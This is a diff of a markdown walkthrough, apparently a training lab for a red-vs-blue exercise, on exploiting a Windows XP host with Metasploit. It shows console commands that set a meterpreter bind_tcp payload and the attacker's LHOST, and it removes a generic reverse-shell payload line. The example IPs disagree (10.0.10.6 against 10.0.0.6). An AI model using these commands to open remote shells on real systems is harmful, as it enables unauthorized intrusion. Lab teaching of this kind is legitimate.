miketweaver/uvucsc-rvb/windowxp.md

 `msf > set PAYLOAD windows/meterpreter/bind_tcp`

 ## Set LocalHost
-Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command.
-If successful, this will establish a remote shell on the target system that we can command.
+Now that we've chosen the exploit and the payload, we need to tell Metasploit the IP address of our machine.
+In this example, our system has an IP address of `10.0.10.6`.
+Use the actual IP address of the system you using.
+Tools such as `sudo ifconfig` should help you find your IP Address.
+It should be in the format of `10.0.10.X`

-`msf > set PAYLOAD generic/shell_reverse_tcp`
+`msf > set LHOST 10.0.0.6`

 ## Exploit
 Now we command Metasploit to exploit the system: